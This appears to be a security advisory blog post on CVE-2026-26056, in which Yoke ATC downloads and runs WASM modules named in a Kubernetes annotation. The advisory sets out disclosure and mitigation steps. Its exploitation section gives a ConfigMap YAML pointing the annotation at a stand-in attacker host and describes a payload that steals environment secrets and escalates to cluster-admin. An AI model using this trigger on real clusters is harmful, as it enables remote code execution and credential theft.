CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-26056

Yoke ATC: Flying Blind into WASM RCE

Alon Barad
Alon Barad
Software Engineer

Feb 13, 2026·5 min read·37 visits

Executive Summary (TL;DR)

Yoke ATC versions <= 0.19.0 blindly download and execute WASM binaries from URLs specified in Kubernetes annotations. An attacker with basic edit rights can escalate to full cluster compromise.

A critical remote code execution vulnerability in Yoke's Air Traffic Controller (ATC) component allows attackers to execute arbitrary WebAssembly (WASM) modules via simple Kubernetes annotations. By failing to validate the origin of 'flight' overrides, Yoke inadvertently turns the cluster's management layer into a malware distribution platform.

The Autopilot from Hell

In the modern DevOps landscape, everyone wants to be 'Cloud Native.' We want our infrastructure defined as code, our deployments automated, and our coffee brewed by a Kubernetes operator. Enter Yoke, a tool designed to be the 'Air Traffic Controller' (ATC) for your Helm-like packages. It promises to manage your flights (deployments) with grace and efficiency. But as any security researcher knows, the more 'magic' a tool promises, the more likely it is to be pulling a rabbit out of a hat that is actually a pipe bomb.

CVE-2026-26056 is the kind of vulnerability that makes you laugh before it makes you cry. It resides in the ATC component, specifically in a feature designed to allow dynamic overrides of deployment logic using WebAssembly (WASM). The idea was noble: allow users to extend logic on the fly. The implementation, however, was a masterclass in implicit trust. It turns out that letting users point your infrastructure controller to a random binary on the internet and saying 'run this, please' is a bad idea. Who knew?

Trusting Strangers with Binaries

The root cause here is a classic case of CWE-94: Improper Control of Generation of Code. The Yoke ATC monitors Kubernetes resources for specific annotations. One such annotation, overrides.yoke.cd/flight, was designed to specify a URL pointing to a WASM module. This module would then be loaded to handle specific logic for that resource.

The flaw? The ATC didn't care where that URL pointed. It didn't verify a signature. It didn't check an allowlist. It didn't even ask for ID. If you annotated a resource with http://attacker.com/pwn.wasm, the ATC—running with high privileges—would obediently reach out, download the payload, and execute it within its own memory space. This is the digital equivalent of picking up a USB drive found in a parking lot and plugging it into the CEO's laptop, except the USB drive is automatically mailed to you by a hacker you've never met.

The Smoking Gun

Let's look at the logic that doomed the controller. While the exact source code is voluminous, the vulnerability boils down to a sequence of operations that should never exist without strict guardrails. The controller's reconciliation loop effectively did this:

  1. Watch for changes in resources.
  2. Read the overrides.yoke.cd/flight annotation.
  3. If present, http.Get(url).
  4. wasmRuntime.Instantiate(downloadedBytes).

The fix, introduced in version 0.19.1 (commit f97305640524f75df4f658be45edca0b0196beb7), essentially locks the cockpit door. It likely removes the ability to load arbitrary remote URLs entirely or enforces strict origin validation, ensuring that only trusted modules (or those bundled with the application) can be executed. It transforms an open plugin system into a closed loop, which is exactly what it should have been for a component running with cluster-admin privileges.

Hijacking the Tower

Exploiting this is terrifyingly simple. You don't need a buffer overflow. You don't need to race a condition. You just need to be able to edit a Kubernetes resource that Yoke is watching. Here is the flight plan for disaster:

Step 1: The Payload First, we compile a malicious WASM module. Since Yoke likely uses a standard WASI interface or a specific host function set, we write a small Rust program that dumps environment variables (hello, AWS keys) or calls back to the Kubernetes API to create a privileged pod.

Step 2: The Setup We host this file at http://evil-server.com/free-robux.wasm.

Step 3: The Trigger We apply a simple patch to a resource:

apiVersion: v1
kind: ConfigMap
metadata:
  name: benign-config
  annotations:
    overrides.yoke.cd/flight: "http://evil-server.com/free-robux.wasm"

Step 4: Execution The Yoke ATC sees the update. "Oh look, flight instructions!" it thinks. It downloads our WASM. It instantiates it. Suddenly, our code is running inside the ATC pod. Since the ATC needs to manage infrastructure, it has a ServiceAccount with immense power. We use that token to grant ourselves cluster-admin rights. Game over.

Total Airspace Collapse

The impact of this vulnerability cannot be overstated. In a Kubernetes environment, the "Controller" pattern usually implies high privilege. Controllers need to create Deployments, Services, and Ingresses. Often, in a lazy setup, they are just given cluster-admin because granular RBAC is "too hard."

By achieving RCE in the ATC, we aren't just compromising one pod; we are compromising the management plane of the cluster. We can exfiltrate secrets, inject sidecars into every other deployment, or simply delete the entire cluster. It is a full compromise of the environment managed by Yoke.

Grounding the Fleet

If you are running Yoke ATC <= 0.19.0, you are currently flying a plane with no doors. Here is how to land safely:

1. Upgrade Immediately Update to version 0.19.1. The developers have patched the vulnerability, likely by restricting or removing the dynamic loading capability.

2. Admission Control (The Safety Net) Even after patching, trust nothing. Use OPA Gatekeeper or Kyverno to strictly forbid the overrides.yoke.cd/flight annotation on any resource unless you explicitly trust the source. A simple constraint template can block this annotation entirely.

3. Network Policies (The Firewall) Why does your infrastructure controller need to talk to the open internet? It probably doesn't. Apply a Kubernetes NetworkPolicy that denies egress traffic from the ATC namespace to the public internet, or whitelists only specific, trusted domains (like your OCI registry). If the ATC can't reach evil-server.com, the exploit fails.

Official Patches

YokeCommit fixing the vulnerability

Fix Analysis (1)

Technical Appendix

CVSS Score
8.8/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Systems

Yoke Air Traffic Controller (ATC)Kubernetes Clusters using Yoke

Affected Versions Detail

Product
Affected Versions
Fixed Version
Yoke
yokecd
<= 0.19.00.19.1
AttributeDetail
CWE IDCWE-94 (Improper Control of Generation of Code)
Attack VectorNetwork (Annotation Injection)
CVSS8.8 (High)
RiskCritical (RCE / Privilege Escalation)
Exploit StatusPoC Available / Trivial
Affected ComponentYoke ATC / WASM Loader

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1610Deploy Container
Execution
T1203Exploitation for Client Execution
Execution
CWE-94
Improper Control of Generation of Code

The software executes code (WASM) downloaded from an untrusted source defined in user input.

Known Exploits & Detection

AdvisoryGHSA Advisory describing the attack vector
NucleiDetection Template Available

Vulnerability Timeline

Vulnerability Published
2026-02-12
Patch Released (v0.19.1)
2026-02-12

References & Sources

  • [1]GHSA-wj8p-jj64-h7ff
  • [2]NVD - CVE-2026-26056

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 2 hours ago•GHSA-VJC7-JRH9-9J86
10.0

Unauthenticated CRUD and Sensitive Data Exposure in 9Router API Endpoints

An access control deficiency in the 9Router dashboard allows unauthenticated remote attackers to perform full CRUD operations on integrated AI providers, extract plaintext API keys, and access complete system conversation histories.

Amit Schendel
Amit Schendel
3 views•5 min read
•about 2 hours ago•CVE-2026-55790
7.4

CVE-2026-55790: DOM-Based Cross-Site Scripting in Craft CMS Support Widget

A DOM-based cross-site scripting (XSS) vulnerability exists in Craft CMS versions 4.0.0-RC1 through 4.17.15 and 5.0.0-RC1 through 5.9.22. The flaw resides within the CraftSupport widget's feedback search component, which fails to neutralize GitHub issue titles before rendering them into the administrator's control panel. An unauthenticated attacker can exploit this vulnerability by submitting a crafted issue to the public Craft CMS repository on GitHub.

Alon Barad
Alon Barad
3 views•7 min read
•about 3 hours ago•CVE-2026-55793
5.9

CVE-2026-55793: Stored DOM-Based Cross-Site Scripting in Craft CMS ElementTableSorter

CVE-2026-55793 is a DOM-based Stored Cross-Site Scripting (XSS) vulnerability affecting Craft CMS versions 5.0.0-RC1 through 5.9.22. An authenticated user with minimum Author privileges can store a malicious payload in an entry's title. When an administrator or high-privileged user performs a drag-and-drop operation under the modified entry in the structure table view, the unescaped payload is retrieved and concatenated into raw HTML, resulting in arbitrary JavaScript execution within the context of the administrative session.

Alon Barad
Alon Barad
4 views•8 min read
•about 3 hours ago•CVE-2026-55794
8.7

CVE-2026-55794: Authenticated Remote Code Execution via Template Injection in Craft CMS

Craft CMS versions 5.9.0 through 5.9.9 are vulnerable to authenticated Remote Code Execution (RCE). An attacker with control panel permissions to edit entries can inject malicious Twig templates into the client-side HTTP Referer header. During the post-save redirect sequence, the server evaluates this user-controlled header using an unsandboxed Twig rendering function, leading to arbitrary system command execution.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 4 hours ago•GHSA-CGFV-JRFP-2R7V
8.5

GHSA-cgfv-jrfp-2r7v: Authenticated SQL Injection in OpenRemote Datapoint Crosstab Export

An authenticated SQL injection vulnerability exists in the datapoint crosstab export functionality of OpenRemote. The vulnerability is caused by insecure manual SQL string construction that concatenates user-controlled display data, specifically asset display names and attribute names, directly into raw SQL statements. These statements are processed by the PostgreSQL database engine using the crosstab function to structure dynamic CSV outputs.

Amit Schendel
Amit Schendel
4 views•5 min read
•about 4 hours ago•GHSA-QRWJ-VH9X-GW5V
8.0

GHSA-QRWJ-VH9X-GW5V: Cross-Agent Server-Side Request Forgery and Remote Code Execution in Coder Workspace Agent

An insecure redirect vulnerability in Coder allows an authenticated attacker who controls a workspace agent to perform unauthorized cross-agent file operations and achieve remote code execution in other workspaces. By exploiting default redirect-following behavior in the control-plane's HTTP client, a malicious agent can redirect legitimate requests to a victim's deterministic tailnet IP address.

Amit Schendel
Amit Schendel
5 views•5 min read